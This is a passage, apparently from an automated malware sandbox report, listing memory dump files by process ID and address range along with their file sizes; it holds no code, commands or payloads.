              • memory/1236-11-0x0000000000000000-mapping.dmp
              • memory/1284-30-0x0000000000000000-mapping.dmp
              • memory/1348-10-0x0000000000000000-mapping.dmp
              • memory/1476-31-0x0000000000000000-mapping.dmp
              • memory/1476-36-0x0000000070990000-0x000000007107E000-memory.dmp
                Filesize

                6.9MB

              • memory/1512-308-0x000000000041A684-mapping.dmp
              • memory/1512-307-0x0000000000400000-0x0000000000420000-memory.dmp
                Filesize

                128KB

              • memory/1512-310-0x0000000000400000-0x0000000000420000-memory.dmp
                Filesize

                128KB

              • memory/1616-8-0x0000000000000000-mapping.dmp
              • memory/1684-13-0x0000000000000000-mapping.dmp
              • memory/1864-25-0x0000000070990000-0x000000007107E000-memory.dmp
                Filesize

                6.9MB

              • memory/1864-17-0x0000000000000000-mapping.dmp
              • memory/1864-337-0x0000000000000000-mapping.dmp
              • memory/1868-15-0x0000000000000000-mapping.dmp
              • memory/1884-347-0x0000000000500000-0x0000000000512000-memory.dmp
                Filesize

                72KB

              • memory/1884-346-0x0000000000250000-0x0000000000251000-memory.dmp
                Filesize

                4KB

              • memory/1884-340-0x0000000000D40000-0x0000000000D41000-memory.dmp
                Filesize

                4KB

              • memory/1884-351-0x0000000000A60000-0x0000000000A70000-memory.dmp
                Filesize

                64KB

              • memory/1884-348-0x0000000000730000-0x0000000000735000-memory.dmp
                Filesize

                20KB

              • memory/1884-350-0x0000000004D10000-0x0000000004D12000-memory.dmp
                Filesize

                8KB

              • memory/1884-333-0x0000000073680000-0x0000000073D6E000-memory.dmp
                Filesize

                6.9MB

              • memory/1884-330-0x0000000000000000-mapping.dmp
              • memory/1908-24-0x0000000070990000-0x000000007107E000-memory.dmp
                Filesize

                6.9MB

              • memory/1908-37-0x0000000002390000-0x0000000002391000-memory.dmp
                Filesize

                4KB

              • memory/1908-16-0x0000000000000000-mapping.dmp
              • memory/1908-55-0x0000000002950000-0x0000000002951000-memory.dmp
                Filesize

                4KB

              • memory/1916-294-0x0000000000210000-0x0000000000211000-memory.dmp
                Filesize

                4KB

              • memory/1916-296-0x0000000000200000-0x0000000000201000-memory.dmp
                Filesize

                4KB

              • memory/1916-293-0x0000000073B80000-0x000000007426E000-memory.dmp
                Filesize

                6.9MB

              • memory/1916-290-0x0000000000000000-mapping.dmp
              • memory/1916-304-0x00000000004D0000-0x00000000004F4000-memory.dmp
                Filesize

                144KB

              • memory/1936-19-0x0000000000000000-mapping.dmp
              • memory/1940-239-0x0000000000400000-0x0000000000493000-memory.dmp
                Filesize

                588KB

              • memory/1940-240-0x000000000043FCC3-mapping.dmp
              • memory/1940-242-0x0000000000400000-0x0000000000493000-memory.dmp
                Filesize

                588KB

              • memory/1976-196-0x00000000065D0000-0x00000000065D1000-memory.dmp
                Filesize

                4KB

              • memory/1976-23-0x0000000070990000-0x000000007107E000-memory.dmp
                Filesize

                6.9MB

              • memory/1976-20-0x0000000000000000-mapping.dmp
              • memory/1976-195-0x00000000065C0000-0x00000000065C1000-memory.dmp
                Filesize

                4KB

              • memory/1980-81-0x0000000006510000-0x0000000006511000-memory.dmp
                Filesize

                4KB

              • memory/1980-131-0x0000000006740000-0x0000000006741000-memory.dmp
                Filesize

                4KB

              • memory/1980-76-0x0000000006420000-0x0000000006421000-memory.dmp
                Filesize

                4KB

              • memory/1980-69-0x0000000006320000-0x0000000006321000-memory.dmp
                Filesize

                4KB

              • memory/1980-18-0x0000000000000000-mapping.dmp
              • memory/1980-68-0x0000000005870000-0x0000000005871000-memory.dmp
                Filesize

                4KB

              • memory/1980-63-0x0000000005830000-0x0000000005831000-memory.dmp
                Filesize

                4KB

              • memory/1980-26-0x0000000070990000-0x000000007107E000-memory.dmp
                Filesize

                6.9MB

              • memory/2040-250-0x0000000000050000-0x0000000000051000-memory.dmp
                Filesize

                4KB

              • memory/2040-249-0x0000000070990000-0x000000007107E000-memory.dmp
                Filesize

                6.9MB

              • memory/2040-245-0x0000000000000000-mapping.dmp
              • memory/2040-252-0x00000000004D0000-0x00000000004D1000-memory.dmp
                Filesize

                4KB

              • memory/2040-279-0x0000000000760000-0x00000000007B1000-memory.dmp
                Filesize

                324KB

              • memory/2056-302-0x0000000000000000-mapping.dmp
              • memory/2248-280-0x0000000000000000-mapping.dmp
              • memory/2248-291-0x0000000002780000-0x0000000002784000-memory.dmp
                Filesize

                16KB

              • memory/2392-222-0x000000000041A684-mapping.dmp
              • memory/2396-225-0x0000000002230000-0x00000000022E0000-memory.dmp
                Filesize

                704KB

              • memory/2396-114-0x0000000000920000-0x0000000000921000-memory.dmp
                Filesize

                4KB

              • memory/2396-237-0x00000000007E0000-0x00000000007ED000-memory.dmp
                Filesize

                52KB

              • memory/2396-103-0x0000000000000000-mapping.dmp
              • memory/2396-106-0x0000000070990000-0x000000007107E000-memory.dmp
                Filesize

                6.9MB

              • memory/2404-277-0x0000000000000000-mapping.dmp
              • memory/2416-278-0x0000000000000000-mapping.dmp
              • memory/2440-111-0x0000000000000000-mapping.dmp
              • memory/2472-118-0x0000000000000000-mapping.dmp
              • memory/2508-172-0x000007FEF8550000-0x000007FEF87CA000-memory.dmp
                Filesize

                2.5MB

              • memory/2536-335-0x0000000000000000-mapping.dmp
              • memory/2536-353-0x00000000003E0000-0x00000000003E3000-memory.dmp
                Filesize

                12KB

              • memory/2536-342-0x0000000000E70000-0x0000000000E71000-memory.dmp
                Filesize

                4KB

              • memory/2536-349-0x00000000005D0000-0x00000000005E1000-memory.dmp
                Filesize

                68KB

              • memory/2536-345-0x0000000000320000-0x0000000000321000-memory.dmp
                Filesize

                4KB

              • memory/2536-339-0x0000000073680000-0x0000000073D6E000-memory.dmp
                Filesize

                6.9MB

              • memory/2588-128-0x0000000000000000-mapping.dmp
              • memory/2592-430-0x0000000000000000-mapping.dmp
              • memory/2592-434-0x0000000000000000-mapping.dmp
              • memory/2592-538-0x0000000000000000-mapping.dmp
              • memory/2592-536-0x0000000000000000-mapping.dmp
              • memory/2592-534-0x0000000000000000-mapping.dmp
              • memory/2592-532-0x0000000000000000-mapping.dmp
              • memory/2592-530-0x0000000000000000-mapping.dmp
              • memory/2592-275-0x0000000000000000-mapping.dmp
              • memory/2592-528-0x0000000000000000-mapping.dmp
              • memory/2592-526-0x0000000000000000-mapping.dmp
              • memory/2592-524-0x0000000000000000-mapping.dmp
              • memory/2592-522-0x0000000000000000-mapping.dmp
              • memory/2592-520-0x0000000000000000-mapping.dmp
              • memory/2592-518-0x0000000000000000-mapping.dmp
              • memory/2592-516-0x0000000000000000-mapping.dmp
              • memory/2592-514-0x0000000000000000-mapping.dmp
              • memory/2592-512-0x0000000000000000-mapping.dmp
              • memory/2592-510-0x0000000000000000-mapping.dmp
              • memory/2592-508-0x0000000000000000-mapping.dmp
              • memory/2592-506-0x0000000000000000-mapping.dmp
              • memory/2592-504-0x0000000000000000-mapping.dmp
              • memory/2592-502-0x0000000000000000-mapping.dmp
              • memory/2592-500-0x0000000000000000-mapping.dmp
              • memory/2592-498-0x0000000000000000-mapping.dmp
              • memory/2592-496-0x0000000000000000-mapping.dmp
              • memory/2592-379-0x00000000000A0000-0x00000000000A1000-memory.dmp
                Filesize

                4KB

              • memory/2592-380-0x0000000000000000-mapping.dmp
              • memory/2592-381-0x00000000000E0000-0x00000000000E1000-memory.dmp
                Filesize

                4KB

              • memory/2592-382-0x0000000000000000-mapping.dmp
              • memory/2592-384-0x0000000000000000-mapping.dmp
              • memory/2592-386-0x0000000000000000-mapping.dmp
              • memory/2592-388-0x0000000000000000-mapping.dmp
              • memory/2592-390-0x0000000000000000-mapping.dmp
              • memory/2592-392-0x0000000000000000-mapping.dmp
              • memory/2592-394-0x0000000000000000-mapping.dmp
              • memory/2592-396-0x0000000000000000-mapping.dmp
              • memory/2592-398-0x0000000000000000-mapping.dmp
              • memory/2592-400-0x0000000000000000-mapping.dmp
              • memory/2592-402-0x0000000000000000-mapping.dmp
              • memory/2592-404-0x0000000000000000-mapping.dmp
              • memory/2592-406-0x0000000000000000-mapping.dmp
              • memory/2592-408-0x0000000000000000-mapping.dmp
              • memory/2592-410-0x0000000000000000-mapping.dmp
              • memory/2592-412-0x0000000000000000-mapping.dmp
              • memory/2592-414-0x0000000000000000-mapping.dmp
              • memory/2592-416-0x0000000000000000-mapping.dmp
              • memory/2592-418-0x0000000000000000-mapping.dmp
              • memory/2592-420-0x0000000000000000-mapping.dmp
              • memory/2592-422-0x0000000000000000-mapping.dmp
              • memory/2592-424-0x0000000000000000-mapping.dmp
              • memory/2592-426-0x0000000000000000-mapping.dmp
              • memory/2592-428-0x0000000000000000-mapping.dmp
              • memory/2592-494-0x0000000000000000-mapping.dmp
              • memory/2592-432-0x0000000000000000-mapping.dmp
              • memory/2592-492-0x0000000000000000-mapping.dmp
              • memory/2592-436-0x0000000000000000-mapping.dmp
              • memory/2592-438-0x0000000000000000-mapping.dmp
              • memory/2592-440-0x0000000000000000-mapping.dmp
              • memory/2592-442-0x0000000000000000-mapping.dmp
              • memory/2592-444-0x0000000000000000-mapping.dmp
              • memory/2592-446-0x0000000000000000-mapping.dmp
              • memory/2592-448-0x0000000000000000-mapping.dmp
              • memory/2592-450-0x0000000000000000-mapping.dmp
              • memory/2592-452-0x0000000000000000-mapping.dmp
              • memory/2592-454-0x0000000000000000-mapping.dmp
              • memory/2592-456-0x0000000000000000-mapping.dmp
              • memory/2592-458-0x0000000000000000-mapping.dmp
              • memory/2592-460-0x0000000000000000-mapping.dmp
              • memory/2592-462-0x0000000000000000-mapping.dmp
              • memory/2592-464-0x0000000000000000-mapping.dmp
              • memory/2592-466-0x0000000000000000-mapping.dmp
              • memory/2592-468-0x0000000000000000-mapping.dmp
              • memory/2592-470-0x0000000000000000-mapping.dmp
              • memory/2592-472-0x0000000000000000-mapping.dmp
              • memory/2592-474-0x0000000000000000-mapping.dmp
              • memory/2592-476-0x0000000000000000-mapping.dmp
              • memory/2592-478-0x0000000000000000-mapping.dmp
              • memory/2592-480-0x0000000000000000-mapping.dmp
              • memory/2592-482-0x0000000000000000-mapping.dmp
              • memory/2592-484-0x0000000000000000-mapping.dmp
              • memory/2592-486-0x0000000000000000-mapping.dmp
              • memory/2592-488-0x0000000000000000-mapping.dmp
              • memory/2592-490-0x0000000000000000-mapping.dmp
              • memory/2616-288-0x0000000000400000-0x0000000000434000-memory.dmp
                Filesize

                208KB

              • memory/2616-285-0x0000000000417A8B-mapping.dmp
              • memory/2616-284-0x0000000000400000-0x0000000000434000-memory.dmp
                Filesize

                208KB

              • memory/2616-133-0x0000000000000000-mapping.dmp
              • memory/2624-363-0x0000000004A70000-0x0000000004A71000-memory.dmp
                Filesize

                4KB

              • memory/2624-355-0x0000000000000000-mapping.dmp
              • memory/2624-359-0x0000000073680000-0x0000000073D6E000-memory.dmp
                Filesize

                6.9MB

              • memory/2624-361-0x0000000000CE0000-0x0000000000CE1000-memory.dmp
                Filesize

                4KB

              • memory/2624-367-0x0000000004980000-0x0000000004981000-memory.dmp
                Filesize

                4KB

              • memory/2640-136-0x0000000000000000-mapping.dmp
              • memory/2672-142-0x0000000000000000-mapping.dmp
              • memory/2724-344-0x0000000000000000-mapping.dmp
              • memory/2728-154-0x000000000043FCC3-mapping.dmp
              • memory/2728-153-0x0000000000400000-0x0000000000498000-memory.dmp
                Filesize

                608KB

              • memory/2728-156-0x0000000000400000-0x0000000000498000-memory.dmp
                Filesize

                608KB

              • memory/2740-162-0x0000000000400000-0x0000000000439000-memory.dmp
                Filesize

                228KB

              • memory/2740-164-0x0000000000417A8B-mapping.dmp
              • memory/2740-168-0x0000000000400000-0x0000000000439000-memory.dmp
                Filesize

                228KB

              • memory/2776-159-0x000000000043FCC3-mapping.dmp
              • memory/2912-175-0x0000000000417A8B-mapping.dmp
              • memory/2992-276-0x0000000000000000-mapping.dmp
              • memory/3024-360-0x0000000000000000-mapping.dmp
              • memory/3024-371-0x0000000005550000-0x0000000005551000-memory.dmp
                Filesize

                4KB

              • memory/3024-366-0x0000000073680000-0x0000000073D6E000-memory.dmp
                Filesize

                6.9MB